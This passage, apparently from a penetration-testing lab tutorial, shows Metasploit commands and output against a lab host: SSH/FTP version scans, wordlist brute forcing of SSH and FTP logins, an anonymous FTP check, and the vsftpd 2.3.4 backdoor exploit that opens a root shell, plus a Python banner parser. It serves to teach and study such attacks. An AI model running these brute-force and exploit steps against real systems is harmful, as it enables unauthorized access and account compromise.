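    for sid in candidate_sids(machine, 500, 504):
        base, rid = split_rid(sid)
        print(sid, classify(rid))
```

Because every candidate is predictable, the only thing limiting this enumeration is whether the target lets your session talk to LSARPC at all: on modern Windows that needs valid credentials (hence SMBUser/SMBPass above), whereas old Samba and pre-Vista Windows answered null sessions.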
Collecting information over SSH
Checking the SSH version
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    22               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)
   TIMEOUT  30               yes       Timeout for the SSH probe
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.102
RHOSTS => 192.168.1.102
msf6 auxiliary(scanner/ssh/ssh_version) > exploit
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/8586a8b6f6b1db938534c4427e2c161d.png)
Brute-forcing SSH
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.102
## Set the wordlist. The one that ships with Metasploit will not cover real targets; later we will use larger ones.
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
## The file does not contain the target's credentials, so for the demonstration we append them by hand (USERPASS_FILE format: one "user password" pair per line).
## In a new terminal window:
┌──(root㉿kali)-[~]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/c3311e58b548595b739021f92522c854.png)
When ssh_login finds a working credential it automatically opens a session on the target; list it with the sessions command. Set STOP_ON_SUCCESS true if one valid login per host is enough, and keep BRUTEFORCE_SPEED low against real systems so you do not lock accounts out or trip rate limiting.
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/e51f7a8e8c69efc32a8e1910fec56685.png)
Collecting information over FTP
Checking the FTP server version
Load the FTP version scanner module:
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 auxiliary(scanner/ftp/ftp_version) > exploit
[+] 192.168.1.102:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.1.102:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > back
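Both ssh_version and ftp_version (the SSH section above and the FTP section here) do the same thing at heart: connect, read the first line the service volunteers, and pull a product and version out of it. The added example below (not code from the article or from Metasploit) implements that for the two banner formats: the RFC 4253 SSH identification string "SSH-protoversion-softwareversion SP comments", and the FTP "220 <text>" greeting as seen above. grab_banner() needs a reachable service; the parsers run offline, and the OpenSSH banner used in the usage is a constructed sample rather than output taken from the lab host.

```python
import re
import socket

SSH_IDENT = re.compile(r"^SSH-(?P<proto>\d\.\d+)-(?P<software>\S+)(?:\s+(?P<comment>.*))?$")
FTP_GREETING = re.compile(r"^220[ -](?P<text>.*)$")
PRODUCT_VERSION = re.compile(r"\(?(?P<product>[A-Za-z][\w.-]*?)\s*v?(?P<version>\d+(?:\.\d+)+)\)?")


def grab_banner(host: str, port: int, timeout: float = 5.0) -> str:
    """Read the first line the service sends; both SSH and FTP servers speak first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = b""
        while b"\n" not in data and len(data) < 1024:
            chunk = s.recv(256)
            if not chunk:
                break
            data += chunk
    return data.decode("utf-8", "replace").split("\n", 1)[0]


def parse_ssh_banner(line: str):
    """RFC 4253 identification string. 'SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1' ->
    {'proto': '2.0', 'software': 'OpenSSH_4.7p1', 'comment': 'Debian-8ubuntu1'}."""
    m = SSH_IDENT.match(line.strip())
    if not m:
        return None
    return {"proto": m.group("proto"), "software": m.group("software"),
            "comment": m.group("comment") or ""}


def software_version(software: str):
    """'OpenSSH_4.7p1' -> ('OpenSSH', '4.7p1'); a bare name yields (name, None)."""
    name, sep, ver = software.partition("_")
    return name, (ver if sep else None)


def parse_ftp_banner(line: str):
    """FTP greeting '220 <text>'; the product/version is only there if the daemon adds it."""
    m = FTP_GREETING.match(line.strip())
    if not m:
        return None
    text = m.group("text")
    v = PRODUCT_VERSION.search(text)
    return {"text": text,
            "product": v.group("product") if v else None,
            "version": v.group("version") if v else None}


def identify(port: int, first_line: str):
    """Dispatch on the port the way the modules do (RPORT 22 for ssh_version, 21 for ftp_version)."""
    if port == 22:
        b = parse_ssh_banner(first_line)
        if b:
            name, ver = software_version(b["software"])
            return {"service": "ssh", "product": name, "version": ver, "raw": first_line.strip()}
    elif port == 21:
        b = parse_ftp_banner(first_line)
        if b:
            return {"service": "ftp", "product": b["product"], "version": b["version"],
                    "raw": first_line.strip()}
    return None


if __name__ == "__main__":
    # Constructed sample banners; swap in grab_banner(host, port) for a live target.
    for port, line in [(21, "220 (vsFTPd 2.3.4)\r\n"),
                       (22, "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n")]:
        print(identify(port, line))
```

A banner is a claim, not a measurement: administrators can change it and distributions backport fixes without bumping the version, so a matched version is a reason to run the corresponding check or exploit module, never a finding by itself.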
With the FTP server's version in hand, search for modules that match it:
msf6 > search 2.3.4
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/da534eaf54ddf9ef666a4e5cfd464e46.png)
or search by product name:
msf6 > search vsftpd
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/d582538a111e6f3ce57f3440ea4ca53b.png)
There is an exploit module: this version of vsftpd was distributed with a backdoor. The vsftpd 2.3.4 source tarball on the project's download site was replaced with a trojaned copy in 2011, so this is not a bug in the program itself, which is why the module is called _backdoor. The banner alone does not prove a host runs the trojaned build; the module's result is the real check.
Let's try the module:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)
Payload options (cmd/unix/interact):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Exploit target:
   Id  Name
   --  ----
   0   Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.102:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.102:21 - USER: 331 Please specify the password.
[+] 192.168.1.102:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.102:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 3 opened (192.168.1.188:46221 -> 192.168.1.102:6200) at 2022-11-25 23:10:07 +0800
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/809e7e57b707eae470fccb35cfa97ee6.png)
We have a shell on the target, and the UID line shows it runs as root. Note the session endpoint, 192.168.1.102:6200: the backdoor is a separate listener that the FTP daemon spawns on that port, which is also a useful thing to look for on the defender's side.
FTP anonymous login scan
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options
Module options (auxiliary/scanner/ftp/anonymous):
   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 auxiliary(scanner/ftp/anonymous) > exploit
[+] 192.168.1.102:21 - 192.168.1.102:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.1.102:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/anonymous) >
The module logs in as anonymous (with the FTPPASS e-mail address as the conventional password) and reports READ when the login succeeds, or READ/WRITE when it can also upload a file; the latter is the dangerous case, since an anonymous writable share is a drop point for malware and web shells.
FTP brute force
msf6 > search ftp_login
Matching Modules
================
   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/ftp/ftp_login                   normal  No     FTP Authentication Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ftp/ftp_login
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST      false            no        Record anonymous/guest logins to the database
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             21               yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 auxiliary(scanner/ftp/ftp_login) > set userpass_file /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
userpass_file => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.1.102:21 - 192.168.1.102:21 - Starting FTP login sweep
[-] 192.168.1.102:21 - 192.168.1.102:21 - LOGIN FAILED: root: (Incorrect: )
[+] 192.168.1.102:21 - 192.168.1.102:21 - Login Successful: msfadmin:msfadmin
[-] 192.168.1.102:21 - 192.168.1.102:21 - LOGIN FAILED: root:123456 (Incorrect: )
[-] 192.168.1.102:21 - 192.168.1.102:21 - LOGIN FAILED: root:!root (Incorrect: )
Successful logins are stored in the Metasploit database (list them with the creds command), so later modules can reuse them through DB_ALL_CREDS; because STOP_ON_SUCCESS is false here, the sweep keeps trying the rest of the wordlist after the hit.